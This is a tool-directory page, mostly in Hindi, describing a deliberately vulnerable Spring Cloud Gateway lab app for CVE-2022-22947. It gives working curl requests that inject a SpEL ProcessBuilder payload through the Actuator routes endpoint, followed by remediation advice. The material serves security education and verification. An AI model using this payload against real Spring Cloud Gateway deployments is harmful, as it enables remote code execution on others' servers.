Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-22947-pb-ai — 一个由AI生成的漏洞验证应用 | Kitploit
उपकरण/GitHubGitHub/skysliently/cve-2022-22947-pb-ai
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationAPI Security TestingLearning & Education
GitHubskysliently/cve-2022-22947-pb-ai

CVE-2022-22947-pb-ai

一个由AI生成的漏洞验证应用

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-22947 Spring Cloud Gateway भेद्यता सत्यापन एप्लिकेशन

यह CVE-2022-22947 भेद्यता को प्रदर्शित करने और सत्यापित करने के लिए एक समर्पित Spring Cloud Gateway एप्लिकेशन है। यह एप्लिकेशन Spring Cloud Gateway के एक असुरक्षित संस्करण का उपयोग करता है, जिसके माध्यम से Actuator एंडपॉइंट के जरिए मनमाना कोड निष्पादित किया जा सकता है।

भेद्यता अवलोकन

CVE-2022-22947 Spring Cloud Gateway में एक रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता है। हमलावर Actuator एंडपॉइंट के माध्यम से दुर्भावनापूर्ण SpEL एक्सप्रेशन वाले रूट्स को गतिशील रूप से जोड़कर मनमाना कोड निष्पादित कर सकता है।

पर्यावरण आवश्यकताएँ

  • Java 11+
  • Maven 3.6+
  • macOS सिस्टम (कैलकुलेटर प्रदर्शन के लिए)

एप्लिकेशन प्रारंभ करें

root@kitploit:~
mvn spring-boot:run

एप्लिकेशन http://localhost:8080 पर प्रारंभ होगा।

भेद्यता सत्यापन चरण

चरण 1: दुर्भावनापूर्ण रूट जोड़ें

/actuator/gateway/routes/test एंडपॉइंट पर POST अनुरोध भेजें, जिसमें दुर्भावनापूर्ण SpEL एक्सप्रेशन वाला रूट शामिल हो:

root@kitploit:~
curl -X POST http://localhost:8080/actuator/gateway/routes/test \
  -H "Content-Type: application/json" \
  -d '{
    "id": "test",
    "filters": [
      {
        "name": "AddResponseHeader",
        "args": {
          "name": "Result",
          "value": "#{new java.lang.ProcessBuilder(\"open\", \"-a\", \"Calculator\").start()}"
        }
      }
    ],
    "uri": "http://example.com",
    "predicates": [
      {
        "name": "Path",
        "args": {
          "_genkey_0": "/test"
        }
      }
    ]
  }'

चरण 2: रूट रिफ्रेश करें

रूट को रिफ्रेश करने के लिए /actuator/gateway/refresh एंडपॉइंट पर POST अनुरोध भेजें:

root@kitploit:~
curl -X POST http://localhost:8080/actuator/gateway/refresh

चरण 3: दुर्भावनापूर्ण कोड ट्रिगर करें

कोड निष्पादन को ट्रिगर करने के लिए दुर्भावनापूर्ण रूट तक पहुँचें:

root@kitploit:~
curl http://localhost:8080/test

अपेक्षित परिणाम

भेद्यता के सफल शोषण के बाद, macOS कैलकुलेटर एप्लिकेशन प्रारंभ हो जाएगा।

मुख्य अनुरोध जानकारी

1. दुर्भावनापूर्ण रूट जोड़ने का अनुरोध

एंडपॉइंट: POST /actuator/gateway/routes/test

अनुरोध शीर्षक:

root@kitploit:~
Content-Type: application/json

अनुरोध निकाय:

root@kitploit:~
{
  "id": "test",
  "filters": [
    {
      "name": "AddResponseHeader",
      "args": {
        "name": "Result",
        "value": "#{new java.lang.ProcessBuilder(\"open\", \"-a\", \"Calculator\").start()}"
      }
    }
  ],
  "uri": "http://example.com",
  "predicates": [
    {
      "name": "Path",
      "args": {
        "_genkey_0": "/test"
      }
    }
  ]
}

2. रूट रिफ्रेश करने का अनुरोध

एंडपॉइंट: POST /actuator/gateway/refresh

3. भेद्यता ट्रिगर करने का अनुरोध

एंडपॉइंट: GET /test

भेद्यता विश्लेषण

यह भेद्यता हमलावर को Actuator एंडपॉइंट के माध्यम से गतिशील रूप से रूट जोड़ने और रूट फिल्टर में SpEL एक्सप्रेशन का उपयोग करके मनमाना कोड निष्पादित करने की अनुमति देती है। भेद्यता का मूल कारण Spring Cloud Gateway द्वारा रूट कॉन्फ़िगरेशन में SpEL एक्सप्रेशन का अनुचित प्रसंस्करण है।

सुधार सुझाव

  1. Spring Cloud Gateway 3.1.1+ या 3.0.7+ में अपग्रेड करें
  2. Actuator एंडपॉइंट को अक्षम करें या एक्सेस प्रतिबंधित करें
  3. Actuator एंडपॉइंट की सुरक्षा के लिए Spring Security का उपयोग करें

संस्करण जानकारी

  • Spring Boot: 2.6.2
  • Spring Cloud: 2021.0.0
  • Spring Cloud Gateway: 3.1.0 (असुरक्षित संस्करण)

सावधानियाँ

⚠️ सुरक्षा चेतावनी: यह एप्लिकेशन केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। कृपया इस एप्लिकेशन को उत्पादन वातावरण में उपयोग या तैनात न करें।

⚠️ कानूनी घोषणा: इस एप्लिकेशन का उपयोग करके भेद्यता परीक्षण करते समय, सुनिश्चित करें कि आपके पास उचित प्राधिकरण है। अनधिकृत परीक्षण कानूनों और विनियमों का उल्लंघन कर सकता है।

टूल डाउनलोड करें